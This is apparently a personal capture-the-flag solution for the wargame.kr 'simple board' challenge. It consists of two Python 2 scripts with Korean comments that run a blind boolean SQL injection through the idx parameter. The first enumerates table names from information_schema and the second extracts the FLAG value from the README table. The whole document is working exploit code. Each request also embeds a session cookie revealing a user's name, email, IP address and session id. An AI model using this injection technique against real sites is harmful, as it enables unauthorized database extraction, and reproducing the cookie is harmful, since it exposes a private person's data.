wargame.kr simple board

#테이블 injection
# -*-coding:utf8 -*-

import urllib2

print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20table_name%20from%20information_schema.tables%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find table " + dat
    n += 1
print "[*] Finish!"

#플래그 구하기
# 조금 수정 필요, 답 나옴
# -*-coding:utf8 -*-
import urllib2
print "[*] start!"
n = 0
while n < 43:
    dat = ""
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20FLAG%20from%20README%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find KEY " + dat
    n += 1
print "[*] Finish!"